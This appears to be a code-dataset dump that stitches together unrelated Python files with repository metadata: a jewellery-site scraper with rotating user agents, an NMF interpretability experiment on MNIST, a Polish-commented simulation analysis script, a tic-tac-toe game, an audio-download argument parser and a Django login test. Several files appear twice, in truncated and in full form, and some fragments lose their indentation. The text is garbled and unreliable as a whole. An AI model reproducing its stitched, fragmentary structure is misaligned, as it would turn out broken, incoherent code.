'https://pl.pandora.net/pl/bizuteria/?start={}&sz=36&format=page-element',
'https://se.pandora.net/sv/smycken/?start={}&sz=36&format=page-element',
'https://at.pandora.net/de/schmuck/?start={}&sz=36&format=page-element',
'https://au.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://au.pandora.net/en/jewellery/?start={}&sz=36&format=page-element']
headers = ['Mozilla/5.0 CK={} (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Mozilla/5.0 (iPad; CPU OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148']
def create_catalog(websites, save=True):
    """Scrape every regional listing site and build {product_id: info_dict}.

    For each site template: read the total product count from the landing
    page, page through the listing collecting the per-product JSON blob
    embedded in each 'product-details' input, then visit every new product
    page to gather its image URLs (main images plus every other frame of the
    360-degree spin viewer).

    :param websites: listing-URL templates with a '{}' placeholder for the
        paging start offset.
    :param save: when True, also dump the catalog to '../catalog.json'.
    :return: dict mapping product_id -> product info dict, with an added
        'product_image_url' list per product.
    """
    new_catalog = {}
    for site in tqdm(websites, desc='For every site'):
        # Fresh session per site with a randomized User-Agent.
        s = requests.Session()
        s.headers['User-Agent'] = random.choice(headers)
        s.max_redirects = 60
        product_urls = {}
        #just get the start site in order to look up total products on the site
        a = s.get(site.format('0'))
        start = BeautifulSoup(a.content, 'lxml')
        total_products = int(start.find('input', id='products_count')['value'])
        products_per_page = int(start.find('input', id='pageload_product_count')['value'])
        # get info on all products and their primary image url:
        for page in range(0, total_products, products_per_page):
            j = s.get(site.format(page))
            jewellery = BeautifulSoup(j.content, 'lxml')
            product_list = jewellery.find_all('input', class_='product-details', attrs={"value": True})
            for item in product_list:
                info_dict = json.loads(item['value'])
                # Products seen on an earlier site are kept as-is.
                if info_dict["product_id"] in new_catalog:
                    pass
                else:
                    new_catalog[info_dict["product_id"]] = info_dict
                    product_urls[info_dict["product_id"]] = info_dict['product_url']
        # get all images for every product:
        # NOTE(review): leave='False' is a (truthy) string, not the boolean
        # False -- probably a typo; confirm the intended tqdm behaviour.
        for iD, url in tqdm(product_urls.items(), desc='Collecting all new image urls', leave='False'):
            product_site = s.get(url)
            product = BeautifulSoup(product_site.content, 'lxml')
            # list of image_urls
            image_list = product.find_all('a', class_='main-image', attrs={'href': True})
            url_list = []
            for item in image_list:
                url_list.append(item['href'])
            # find all the spin360 images:
            spin360 = product.find_all('img', class_='spin-reel', attrs={'data-frames': True, 'data-images': True})
            if spin360:
                # get every other spin360 image (all of them are too much)
                for frame in range(1, int(spin360[0]['data-frames']), 2):
                    # Frame number is zero-padded and substituted for '##'.
                    i = str(frame).zfill(2)
                    url_list.append(spin360[0]['data-images'].replace("##", i))
            new_catalog[iD]['product_image_url'] = url_list
    if save:
        a_file = open("../catalog.json", "w")
        json.dump(new_catalog, a_file)
        a_file.close()
    return new_catalog
if __name__ == "__main__":
new_catalog = create_catalog(save=True, websites=websites)
has_no_class = dict_from_json('id_not_in_masterfile.json')
for product in has_no_class:
if product in new_catalog.keys():
new_catalog.pop(product)
a_file = open("../catalog.json", "w")
json.dump(new_catalog, a_file)
a_file.close() | 2,435 | 0 | 23 |
2dffac327b451073edbc101c6a98c989c4acd12b | 7,900 | py | Python | AnalyzeLazyTime.py | pirtim/complex_networks_sim | f669c83439d9386d1f4e33bcb60f16f0dac7278d | [
"MIT"
] | null | null | null | AnalyzeLazyTime.py | pirtim/complex_networks_sim | f669c83439d9386d1f4e33bcb60f16f0dac7278d | [
"MIT"
] | null | null | null | AnalyzeLazyTime.py | pirtim/complex_networks_sim | f669c83439d9386d1f4e33bcb60f16f0dac7278d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division #~ Domysle dzielenie int jako liczb float
# from igraph import * #~ Niepotrzebne
import random #~ Niepotrzebne
import matplotlib
# matplotlib.use('Agg')
import matplotlib.pyplot as plt #~ Do wykresow
from matplotlib import rc
import time #~ Niepotrzebne
import os.path #~ Do sprawdzania istnienia plikow
import numpy as np #~ Do operacjach na array
import cPickle as pickle
import json
from FilesManagment import CheckFolder, CompressData
from PIL import Image
#~ Funkcja bierze liste i odwraca tam gdzie sa mniejsze niz 0.5
#~ Funkcja bierze liste i przedloza ja zerami lub jedynkami do zadanej wielkosci
if __name__ == '__main__':
# skrypt do analizowania przejscia fazowego
rc('font', family='Arial') #Plotowanie polskich liter
#~ Definicje stalych symulacji
stg = {
# 'CONST_CLIQUE' : 3, #~ Wielkosc kliki
'CONST_VERTICES' : 1000, #~ Ilosc wezlow
'CONST_OVERRIDEN' : False, #~ Czy ma nadpisywac pliki podczas zapisywania wynikow
'CONST_DUMP' : True, # czy ma zrzucac wektory wynikow
# 'CONST_PATH_BASIC_FOLDER' : 'Wyniki_barabasi_lazy_fazowe',
'CONST_PATH_BASIC_FOLDER' : 'Wyniki_lazy_meanK',
'CONST_MEAN_k' : 22.0,
'CONST_PATH_WYK' : 'time_dla_er_lazy_fazowe_k8',
'CONST_FAZOWE' : False,
'CONST_START_MAGNETIZATION' : 0.5
}
analyze(stg)
| 42.934783 | 139 | 0.630759 | # -*- coding: utf-8 -*-
from __future__ import division #~ Domysle dzielenie int jako liczb float
# from igraph import * #~ Niepotrzebne
import random #~ Niepotrzebne
import matplotlib
# matplotlib.use('Agg')
import matplotlib.pyplot as plt #~ Do wykresow
from matplotlib import rc
import time #~ Niepotrzebne
import os.path #~ Do sprawdzania istnienia plikow
import numpy as np #~ Do operacjach na array
import cPickle as pickle
import json
from FilesManagment import CheckFolder, CompressData
from PIL import Image
def crop_image(filepath):
    """Trim uniform white borders from the image at *filepath*, in place.

    A row/column is considered empty when every channel of every pixel in it
    is 255; the image is cropped to the bounding box of non-empty pixels and
    written back over the original file.
    """
    img = Image.open(filepath)
    img.load()
    pixels = np.asarray(img)
    # Darkest channel per pixel: white pixels stay 255 here.
    darkest = pixels.min(axis=2)
    nonwhite_cols = np.where(darkest.min(axis=0) < 255)[0]
    nonwhite_rows = np.where(darkest.min(axis=1) < 255)[0]
    top, bottom = nonwhite_rows.min(), nonwhite_rows.max()
    left, right = nonwhite_cols.min(), nonwhite_cols.max()
    cropped = pixels[top:bottom + 1, left:right + 1, :]
    Image.fromarray(cropped).save(filepath)
#~ Funkcja bierze liste i odwraca tam gdzie sa mniejsze niz 0.5
def OdwrocMniejsze(lista):
    """Return *lista* as a list, flipped to 1-x when it ended below 0.5.

    Trajectories are symmetric around 0.5, so runs that finished in the
    lower absorbing state are mirrored to the upper one. An empty input now
    returns [] instead of raising IndexError.
    """
    arr = np.asarray(lista)
    if arr.size == 0:
        return []
    if arr[-1] < 0.5:
        arr = 1 - arr
    return list(arr)
#~ Funkcja bierze liste i przedloza ja zerami lub jedynkami do zadanej wielkosci
def PrzedlozDo(lista, doIle):
    """Pad *lista* up to length *doIle* with a constant tail.

    If the run ended above 0.995 (reached the upper absorbing state) the
    tail is 1s, otherwise 0s. Returns a numpy array of length *doIle*.
    """
    tail = doIle - len(lista)
    fill = 1 if lista[-1] > 0.995 else 0
    return np.pad(lista, (0, tail), 'constant', constant_values=(fill))
def plotuj(stg, data, type_plot):
fig = plt.figure()
if type_plot == 'hist':
plt.hist(data, bins=80, normed = True)
plt.grid(True)
# plt.hist(data, bins = 20, normed = True, log = True, histtype = 'step')
elif type_plot == 'hist_log':
plt.hist(data, bins=np.logspace(1, 4, 40), normed = True)
plt.gca().set_xscale("log")
plt.gca().set_yscale("log")
plt.grid(True)
# plt.hist(data, bins = 20, normed = True, log = True, histtype = 'step')
elif type_plot == 'dirr':
plt.plot(data.keys(), data.values(), 'o')
elif type_plot == 'log_norm':
print np.log(np.array(data))
plt.hist(np.log(np.array(data)), bins=40, normed = True)
plt.grid(True)
else:
raise ValueError
plt.ylabel(u'Prawdopodobieństwo $P_T(t)$')
plt.xlabel(u'Zlogarytmowany krok symulacji w liczbach $N$')
# fig.suptitle('Histogram czasu trwania symulacji - {}.'.format(type_plot))
plt.title(u'Rozkład zlogarytowanych czasów relaksacji dla modelu ,,leniwego\'\'')
fig.savefig(os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK']+'_{}'.format(type_plot) + '.png'), dpi = 200)
print 'Plotted to: {}'.format(os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK']+'_{}'.format(type_plot) + '.png'))
fig.clf()
crop_image(os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK']+'_{}'.format(type_plot) + '.png'))
def check_folder_k(spin, path_file, basic_dir, stg):
path_k = os.path.join(basic_dir, path_file, 'k{}'.format(spin))
result = 0
if os.path.exists(path_k):
for path_opis in filter(lambda name: name.endswith('.json'), os.listdir(path_k)):
with open(os.path.join(path_k, path_opis), 'r') as f:
dic = json.load(f)
if dic['CONST_VERTICES'] == stg['CONST_VERTICES'] and dic['WYN_meanG'] == stg['WYN_meanG']:
result += 1
return result
def check_folder_simple(path_file, basic_dir, stg):
path = os.path.join(basic_dir, path_file)
up, down = 0, 0
if os.path.exists(path):
for path_opis in filter(lambda name: name.endswith('.json'), os.listdir(path)):
with open(os.path.join(path, path_opis), 'r') as f:
dic = json.load(f)
if dic['CONST_VERTICES'] == stg['CONST_VERTICES'] and dic['CONST_MEAN_k'] == stg['CONST_MEAN_k']:
if dic['WYN_M'] == 0:
down += 1
elif dic['WYN_M'] == 1:
up += 1
return down, up
def check_file(dic, stg):
stan = True
if 'CONST_VERTICES' in stg:
if 'CONST_VERTICES' not in dic:
return False
stan = stan and stg['CONST_VERTICES'] == dic['CONST_VERTICES']
if 'CONST_MEAN_k' in stg:
if 'CONST_MEAN_k' not in dic:
return False
stan = stan and stg['CONST_MEAN_k'] == dic['CONST_MEAN_k']
if 'CONST_START_MAGNETIZATION' in stg:
if 'CONST_START_MAGNETIZATION' not in dic:
return False
stan = stan and stg['CONST_START_MAGNETIZATION'] == dic['CONST_START_MAGNETIZATION']
# if not stan and dic['CONST_VERTICES'] == 10000:
# print dic
return stan
def check_folder_time(wyn_xy, wyn_x, path_file, basic_dir, stg):
path = os.path.join(basic_dir, path_file)
if os.path.exists(path):
for path_opis in filter(lambda name: name.endswith('.json'), os.listdir(path)):
with open(os.path.join(path, path_opis), 'r') as f:
dic = json.load(f)
if dic['CONST_SIM_LONG']*dic['CONST_VERTICES'] != dic['WYN_j']+1 and check_file(dic, stg):
time = int(dic['WYN_j']/dic['CONST_VERTICES'])
wyn_x.append(time)
if time in wyn_xy:
wyn_xy[time] += 1
else:
wyn_xy[time] = 1
def analyze(stg):
stg['CONST_STANDARD_PATH_ANALYZE'] = os.path.join(stg['CONST_PATH_BASIC_FOLDER'], 'analyze')
CheckFolder(stg['CONST_STANDARD_PATH_ANALYZE'])
stg['CONST_SHORT_RAW_PATH'] = os.path.join(stg['CONST_PATH_BASIC_FOLDER'], 'RawDataMag')
wyn_xy = {}
wyn_x = []
# x, y = [], []
basic_dir = stg['CONST_SHORT_RAW_PATH']
if 'CONST_FAZOWE' in stg and stg['CONST_FAZOWE']:
for path_file in sorted(os.listdir(basic_dir)):
basic_dir_inner = os.path.join(basic_dir, path_file)
for path_file_inner in sorted(os.listdir(basic_dir_inner)):
check_folder_time(wyn_xy, wyn_x, path_file_inner, basic_dir_inner, stg)
for path_file in sorted(os.listdir(basic_dir)):
check_folder_time(wyn_xy, wyn_x, path_file, basic_dir, stg)
# H:\Dropbox\Studia\licencjat\Symulacje2016.07.07\complex_networks_sim\Wyniki_lazy_fazowe\RawDataMag\val_start_0.50000
if stg['CONST_DUMP']:
CompressData(wyn_xy, os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK']), pickling=True)
with open(os.path.join(stg['CONST_STANDARD_PATH_ANALYZE'], stg['CONST_PATH_WYK'] + '.data') , 'w') as f:
f.writelines(str(wyn_xy))
print len(wyn_x)
print sorted(wyn_xy.iteritems(), key=lambda (x, y): x)
plotuj(stg, wyn_xy, 'dirr')
plotuj(stg, wyn_x, 'hist')
plotuj(stg, wyn_x, 'hist_log')
plotuj(stg, wyn_x, 'log_norm')
if __name__ == '__main__':
# skrypt do analizowania przejscia fazowego
rc('font', family='Arial') #Plotowanie polskich liter
#~ Definicje stalych symulacji
stg = {
# 'CONST_CLIQUE' : 3, #~ Wielkosc kliki
'CONST_VERTICES' : 1000, #~ Ilosc wezlow
'CONST_OVERRIDEN' : False, #~ Czy ma nadpisywac pliki podczas zapisywania wynikow
'CONST_DUMP' : True, # czy ma zrzucac wektory wynikow
# 'CONST_PATH_BASIC_FOLDER' : 'Wyniki_barabasi_lazy_fazowe',
'CONST_PATH_BASIC_FOLDER' : 'Wyniki_lazy_meanK',
'CONST_MEAN_k' : 22.0,
'CONST_PATH_WYK' : 'time_dla_er_lazy_fazowe_k8',
'CONST_FAZOWE' : False,
'CONST_START_MAGNETIZATION' : 0.5
}
analyze(stg)
| 6,187 | 0 | 212 |
3406049335d99d644917125e8b716c8c4bbe412b | 4,174 | py | Python | tic-tac-toe.py | RuTh-git/Tic-tac-toe-project | 8a7f7720b91ca7f519c5fd66925ef154aa938142 | [
"MIT"
] | null | null | null | tic-tac-toe.py | RuTh-git/Tic-tac-toe-project | 8a7f7720b91ca7f519c5fd66925ef154aa938142 | [
"MIT"
] | null | null | null | tic-tac-toe.py | RuTh-git/Tic-tac-toe-project | 8a7f7720b91ca7f519c5fd66925ef154aa938142 | [
"MIT"
] | null | null | null | # -------Global Variables---------
# Game board
board =["-","-","-",
"-","-","-",
"-","-","-",]
# If game is still going
game_still_going = True
# Who won? Or tie?
winner = None
# Whos turn is it
current_player = "X"
# Display board
# Play a game of tic tac toe
# Handle a single turn of an arbitrary player
play_game()
# board
# display board
# play game
# handle turn
# check win
# check rows
# check columns
# check diagonals
# check tie
# flip player
| 20.766169 | 74 | 0.626977 | # -------Global Variables---------
# Game board
board =["-","-","-",
"-","-","-",
"-","-","-",]
# If game is still going
game_still_going = True
# Who won? Or tie?
winner = None
# Whos turn is it
current_player = "X"
# Display board
def display_board():
print("\n")
print(board[0] + " | " + board[1] + " | " + board[2])
print(board[3] + " | " + board[4] + " | " + board[5])
print(board[6] + " | " + board[7] + " | " + board[8])
print("\n")
# Play a game of tic tac toe
def play_game():
# Display initial board
display_board()
# While the game is still going
while game_still_going:
# handle a single turn of an arbitrary player
handle_turn(current_player)
# check if the game has ended
check_if_game_over()
# Flip to the other player
flip_player()
# The game has ended
if winner == "X" or winner == "O":
print(winner + " won.")
elif winner == None:
print("Tie.")
# Handle a single turn of an arbitrary player
def handle_turn(player):
print(player + "'s turn.")
print("\n")
position = input("Choose a position from 1-9: ")
valid = False
while not valid:
while position not in ["1", "2", "3", "4", "5", "6", "7", "8", "9"]:
position = input("Choose a position from 1-9: ")
position = int(position) - 1
if board[position] == "-":
valid = True
else:
print("You can't go there. Go again.")
print("\n")
board[position] = player
display_board()
def check_if_game_over():
check_for_winner()
check_if_tie()
def check_for_winner():
# Set up global Variables
global winner
# check rows
row_winner = check_rows()
# check columns
column_winner = check_columns()
# check diagonals
diagonal_winner = check_diagonals()
if row_winner:
winner = row_winner
elif column_winner:
winner = column_winner
elif diagonal_winner:
winner = diagonal_winner
else:
winner = None
return
def check_rows():
# Set up global variables
global game_still_going
# check if any of the rows have all the same value (and is not empty)
row_1 = board[0] == board[1] == board[2] != "-"
row_2 = board[3] == board[4] == board[5] != "-"
row_3 = board[6] == board[7] == board[8] != "-"
# If any row does have a match, flag that there is a win
if row_1 or row_2 or row_3:
game_still_going = False
# Return the winner (X or O)
if row_1:
return board[0]
elif row_2:
return board[3]
elif row_3:
return board[6]
return
def check_columns():
# Set up global variables
global game_still_going
# check if any of the columns have all the same value (and is not empty)
column_1 = board[0] == board[3] == board[6] != "-"
column_2 = board[1] == board[4] == board[7] != "-"
column_3 = board[2] == board[5] == board[8] != "-"
# If any column does have a match, flag that there is a win
if column_1 or column_2 or column_3:
game_still_going = False
# Return the winner (X or O)
if column_1:
return board[0]
elif column_2:
return board[1]
elif column_3:
return board[2]
return
def check_diagonals():
# Set up global variables
global game_still_going
# check if any of the columns have all the same value (and is not empty)
diagonal_1 = board[0] == board[4] == board[8] != "-"
diagonal_2 = board[6] == board[4] == board[2] != "-"
# If any column does have a match, flag that there is a win
if diagonal_1 or diagonal_2:
game_still_going = False
# Return the winner (X or O)
if diagonal_1:
return board[0]
elif diagonal_2:
return board[6]
return
def check_if_tie():
global game_still_going
if "-" not in board:
game_still_going = False
return
def flip_player():
# global variables we need
global current_player
# if the current player was x, then change it to O
if current_player == "X":
current_player = "O"
# If the current player was O, then change it to X
elif current_player == "O":
current_player = "X"
return
play_game()
# board
# display board
# play game
# handle turn
# check win
# check rows
# check columns
# check diagonals
# check tie
# flip player
| 3,449 | 0 | 227 |
8c4cc89a3ae7d346b023dc93a3ae432c4760b998 | 1,560 | py | Python | preprocessing/audio_download/helperfiles/audio_download.py | sereini/SpeechSeparationModel | ea44c845762112f3bc2e5e54c5530e6fd429464f | [
"MIT"
] | 3 | 2019-12-05T10:22:19.000Z | 2021-11-08T12:19:54.000Z | preprocessing/audio_download/helperfiles/audio_download.py | sereini/SpeechSeparationModel | ea44c845762112f3bc2e5e54c5530e6fd429464f | [
"MIT"
] | null | null | null | preprocessing/audio_download/helperfiles/audio_download.py | sereini/SpeechSeparationModel | ea44c845762112f3bc2e5e54c5530e6fd429464f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 17:34:23 2019
@author: chalbeisen
This program is to download audios. The required arguments are set by the
powershell script "Run-audio_download.ps1".
"""
from LookingToListen_Audio_clean import Audio
import argparse
import sys
'''
------------------------------------------------------------------------------
desc: get parameters from script "Run-audio_download.ps1"
param:
argv: arguments from script "Run-audio_download.ps1"
return: parsed arguments
------------------------------------------------------------------------------
'''
'''
------------------------------------------------------------------------------
desc: run audio download
param:
argv: arguments from script "Run-audio_download.ps1"
return: -
------------------------------------------------------------------------------
'''
if __name__== "__main__":
main(parse_arguments(sys.argv[1:])) | 31.836735 | 79 | 0.525 | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 17:34:23 2019
@author: chalbeisen
This program is to download audios. The required arguments are set by the
powershell script "Run-audio_download.ps1".
"""
from LookingToListen_Audio_clean import Audio
import argparse
import sys
'''
------------------------------------------------------------------------------
desc: get parameters from script "Run-audio_download.ps1"
param:
argv: arguments from script "Run-audio_download.ps1"
return: parsed arguments
------------------------------------------------------------------------------
'''
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--dir', type=str,
help='Define directory of audios', default='audio/audio_speech')
parser.add_argument('--start', type=int,
help='Define start index of audio download', default=0)
parser.add_argument('--stop', type=int,
help='Define start index of audio download', default=123800)
return parser.parse_args(argv)
'''
------------------------------------------------------------------------------
desc: run audio download
param:
argv: arguments from script "Run-audio_download.ps1"
return: -
------------------------------------------------------------------------------
'''
def main(argv):
audio = Audio()
audio.download_speech(argv.dir, argv.start, argv.stop)
if __name__== "__main__":
main(parse_arguments(sys.argv[1:])) | 508 | 0 | 58 |
897df636f8322f5671a5d204f36d6950b78f524e | 4,566 | py | Python | ex_simulation/mnist_based/cd_interp_nmf.py | csinva/transformation-importance | 256ebdb7c05bcc34c8f8bdbbdd0a09dc3585ea0e | [
"MIT"
] | 6 | 2020-03-05T14:44:09.000Z | 2021-12-14T12:28:24.000Z | ex_simulation/mnist_based/cd_interp_nmf.py | csinva/transformation-importance | 256ebdb7c05bcc34c8f8bdbbdd0a09dc3585ea0e | [
"MIT"
] | null | null | null | ex_simulation/mnist_based/cd_interp_nmf.py | csinva/transformation-importance | 256ebdb7c05bcc34c8f8bdbbdd0a09dc3585ea0e | [
"MIT"
] | 2 | 2020-04-23T19:29:38.000Z | 2021-07-12T19:45:55.000Z | import numpy as np
import matplotlib.pyplot as plt
import torch
import random
device = 'cuda' if torch.cuda.is_available() else 'cpu'
from scipy.ndimage import gaussian_filter
import sys
from tqdm import tqdm
from functools import partial
import acd
from copy import deepcopy
sys.path.append('../..')
sys.path.append('../../..')
from transforms_torch import bandpass_filter
# plt.style.use('dark_background')
sys.path.append('../../../dsets/mnist')
import dset
from model import Net, Net2c
from util import *
from numpy.fft import *
from torch import nn
from style import *
from captum.attr import (
InputXGradient,
Saliency,
GradientShap,
DeepLift,
DeepLiftShap,
IntegratedGradients,
LayerConductance,
NeuronConductance,
NoiseTunnel,
)
import pickle as pkl
from torchvision import datasets, transforms
from sklearn.decomposition import NMF
import transform_wrappers
import visualize as viz
from model import Net, Net2c
torch.manual_seed(42)
np.random.seed(42)
from acd_wooseok.acd.scores import cd
from acd_wooseok.acd.util import tiling_2d
from acd_wooseok.acd.scores import score_funcs
from torchvision import datasets, transforms
# import modules
from funcs import *
from matfac import *
sys.path.append('../../../..')
from hierarchical_dnn_interpretations.acd.scores import cd as acd
# load args
args = dset.get_args()
args.batch_size = int(args.batch_size/2) # half the batchsize
args.epochs = 50
args.cuda = not args.no_cuda and torch.cuda.is_available()
# load mnist dataloader
train_loader, test_loader = dset.load_data_with_indices(args.batch_size, args.test_batch_size, device)
# dataset
X = train_loader.dataset.data.numpy().astype(np.float32)
X = X.reshape(X.shape[0], -1)
X /= 255
Y = train_loader.dataset.targets.numpy()
X_test = test_loader.dataset.data.numpy().astype(np.float32)
X_test = X_test.reshape(X_test.shape[0], -1)
X_test /= 255
Y_test = test_loader.dataset.targets.numpy()
# load NMF object
# run NMF
# nmf = NMF(n_components=30, max_iter=1000)
# nmf.fit(X)
# pkl.dump(nmf, open('./results/nmf_30.pkl', 'wb'))
nmf = pkl.load(open('../results/nmf_30.pkl', 'rb'))
D = nmf.components_
# nmf transform
W = nmf.transform(X)
W_test = nmf.transform(X_test)
# store results
list_of_results = {
'acd': [],
'cd': []
}
for n_iter in range(nmf.n_components):
dict_indx = n_iter
model = Net2c().to(device)
model.load_state_dict(torch.load('../models/nmf/net2c_{}.pth'.format(dict_indx), map_location=device))
model = model.eval()
# knockout first dictionary and redefine train and test dataset
indx = np.argwhere(W[:,dict_indx] > 0).flatten()
indx_t = np.argwhere(W_test[:,dict_indx] > 0).flatten()
# subset dataloader
train_loader, test_loader = dset.load_data_with_indices(args.batch_size,
args.test_batch_size,
device,
subset_index=[indx, indx_t])
# nmf transform layers
nmf_transformer = transform_wrappers.TransformLayers(D).to(device)
# convert nmf weight to tensor
W_test_t = torch.Tensor(W_test).to(device)
sweep_dim = 1
tiles = torch.Tensor(tiling_2d.gen_tiles(W_test[0:1], fill=0, method='cd', sweep_dim=sweep_dim)).to(device)
# store results
results = {
'acd': [],
'cd': []
}
for batch_indx, (data, target, data_indx) in enumerate(test_loader):
# loop over nmf basis
scores_acd = []
scores_cd = []
for basis_indx in range(nmf.n_components):
im_parts = nmf_transformer(W_test_t[data_indx]*tiles[basis_indx])
scores_acd.append(acd.cd(data, model, mask=None, model_type=None, device='cuda', transform=None,
relevant=im_parts)[0].data.cpu().numpy()[:,0])
scores_cd.append(cd.cd(data, model, mask=None, model_type=None, device='cuda', transform=None,
relevant=im_parts)[0].data.cpu().numpy()[:,0])
print('\r iter, batch index: {}, {} [component index: {}]'.format(n_iter, batch_indx, basis_indx), end='')
scores_acd = np.vstack(scores_acd).T
scores_cd = np.vstack(scores_cd).T
results['acd'].append(scores_acd)
results['cd'].append(scores_cd)
list_of_results['acd'].append(np.vstack(results['acd']))
list_of_results['cd'].append(np.vstack(results['cd']))
pkl.dump(list_of_results, open('../results/cd_nmf.pkl', 'wb'))
| 33.328467 | 118 | 0.669295 | import numpy as np
import matplotlib.pyplot as plt
import torch
import random
device = 'cuda' if torch.cuda.is_available() else 'cpu'
from scipy.ndimage import gaussian_filter
import sys
from tqdm import tqdm
from functools import partial
import acd
from copy import deepcopy
sys.path.append('../..')
sys.path.append('../../..')
from transforms_torch import bandpass_filter
# plt.style.use('dark_background')
sys.path.append('../../../dsets/mnist')
import dset
from model import Net, Net2c
from util import *
from numpy.fft import *
from torch import nn
from style import *
from captum.attr import (
InputXGradient,
Saliency,
GradientShap,
DeepLift,
DeepLiftShap,
IntegratedGradients,
LayerConductance,
NeuronConductance,
NoiseTunnel,
)
import pickle as pkl
from torchvision import datasets, transforms
from sklearn.decomposition import NMF
import transform_wrappers
import visualize as viz
from model import Net, Net2c
torch.manual_seed(42)
np.random.seed(42)
from acd_wooseok.acd.scores import cd
from acd_wooseok.acd.util import tiling_2d
from acd_wooseok.acd.scores import score_funcs
from torchvision import datasets, transforms
# import modules
from funcs import *
from matfac import *
sys.path.append('../../../..')
from hierarchical_dnn_interpretations.acd.scores import cd as acd
# load args
args = dset.get_args()
args.batch_size = int(args.batch_size/2) # half the batchsize
args.epochs = 50
args.cuda = not args.no_cuda and torch.cuda.is_available()
# load mnist dataloader
train_loader, test_loader = dset.load_data_with_indices(args.batch_size, args.test_batch_size, device)
# dataset
X = train_loader.dataset.data.numpy().astype(np.float32)
X = X.reshape(X.shape[0], -1)
X /= 255
Y = train_loader.dataset.targets.numpy()
X_test = test_loader.dataset.data.numpy().astype(np.float32)
X_test = X_test.reshape(X_test.shape[0], -1)
X_test /= 255
Y_test = test_loader.dataset.targets.numpy()
# load NMF object
# run NMF
# nmf = NMF(n_components=30, max_iter=1000)
# nmf.fit(X)
# pkl.dump(nmf, open('./results/nmf_30.pkl', 'wb'))
nmf = pkl.load(open('../results/nmf_30.pkl', 'rb'))
D = nmf.components_
# nmf transform
W = nmf.transform(X)
W_test = nmf.transform(X_test)
# store results
list_of_results = {
'acd': [],
'cd': []
}
for n_iter in range(nmf.n_components):
dict_indx = n_iter
model = Net2c().to(device)
model.load_state_dict(torch.load('../models/nmf/net2c_{}.pth'.format(dict_indx), map_location=device))
model = model.eval()
# knockout first dictionary and redefine train and test dataset
indx = np.argwhere(W[:,dict_indx] > 0).flatten()
indx_t = np.argwhere(W_test[:,dict_indx] > 0).flatten()
# subset dataloader
train_loader, test_loader = dset.load_data_with_indices(args.batch_size,
args.test_batch_size,
device,
subset_index=[indx, indx_t])
# nmf transform layers
nmf_transformer = transform_wrappers.TransformLayers(D).to(device)
# convert nmf weight to tensor
W_test_t = torch.Tensor(W_test).to(device)
sweep_dim = 1
tiles = torch.Tensor(tiling_2d.gen_tiles(W_test[0:1], fill=0, method='cd', sweep_dim=sweep_dim)).to(device)
# store results
results = {
'acd': [],
'cd': []
}
for batch_indx, (data, target, data_indx) in enumerate(test_loader):
# loop over nmf basis
scores_acd = []
scores_cd = []
for basis_indx in range(nmf.n_components):
im_parts = nmf_transformer(W_test_t[data_indx]*tiles[basis_indx])
scores_acd.append(acd.cd(data, model, mask=None, model_type=None, device='cuda', transform=None,
relevant=im_parts)[0].data.cpu().numpy()[:,0])
scores_cd.append(cd.cd(data, model, mask=None, model_type=None, device='cuda', transform=None,
relevant=im_parts)[0].data.cpu().numpy()[:,0])
print('\r iter, batch index: {}, {} [component index: {}]'.format(n_iter, batch_indx, basis_indx), end='')
scores_acd = np.vstack(scores_acd).T
scores_cd = np.vstack(scores_cd).T
results['acd'].append(scores_acd)
results['cd'].append(scores_cd)
list_of_results['acd'].append(np.vstack(results['acd']))
list_of_results['cd'].append(np.vstack(results['cd']))
pkl.dump(list_of_results, open('../results/cd_nmf.pkl', 'wb'))
| 0 | 0 | 0 |
35d38aa3f568c9b1eb9c35fb859a316447af885e | 1,050 | py | Python | src/api/tests.py | cuappdev/scoop-backend | 4bfb2494598831e10bdeede2243061f7ddee1b43 | [
"MIT"
] | null | null | null | src/api/tests.py | cuappdev/scoop-backend | 4bfb2494598831e10bdeede2243061f7ddee1b43 | [
"MIT"
] | 2 | 2022-03-14T22:55:22.000Z | 2022-03-21T18:13:55.000Z | src/api/tests.py | cuappdev/rideshare-backend | 4bfb2494598831e10bdeede2243061f7ddee1b43 | [
"MIT"
] | null | null | null | import json
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APIClient
from .constants import TEST_EMAIL
from .constants import TEST_FIRSTNAME
from .constants import TEST_LASTNAME
| 27.631579 | 80 | 0.667619 | import json
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APIClient
from .constants import TEST_EMAIL
from .constants import TEST_FIRSTNAME
from .constants import TEST_LASTNAME
class TestAuthenticate(TestCase):
AUTHENTICATE_URL = reverse("authenticate")
FIRST_NAME = TEST_FIRSTNAME
LAST_NAME = TEST_LASTNAME
EMAIL = TEST_EMAIL
def setUp(self):
self.client = APIClient()
def test_create_user_and_login(
self,
first_name=FIRST_NAME,
last_name=LAST_NAME,
email=EMAIL,
):
"""Checks if user is successfully created and auth token is returned."""
data = {
"sub": "googleID",
"given_name": first_name,
"family_name": last_name,
"email": email,
}
response = self.client.post(self.AUTHENTICATE_URL, data)
self.assertEqual(response.status_code, 201)
token = json.loads(response.content)["access_token"]
self.assertIsNotNone(token)
| 29 | 767 | 23 |
6b127412effc26232fb45df404dd75fcf5cc85f7 | 25,037 | py | Python | CyberTron5000/cogs/fun.py | niztg/CyberTron5000 | 6b93305ef26e022063bffa8620b53076ba5948f7 | [
"MIT"
] | 20 | 2020-06-20T20:26:33.000Z | 2021-01-12T20:47:52.000Z | CyberTron5000/cogs/fun.py | niztg/CyberTron5000 | 6b93305ef26e022063bffa8620b53076ba5948f7 | [
"MIT"
] | 1,005 | 2020-07-09T18:27:17.000Z | 2020-07-30T20:41:33.000Z | CyberTron5000/cogs/fun.py | niztg/CyberTron5000 | 6b93305ef26e022063bffa8620b53076ba5948f7 | [
"MIT"
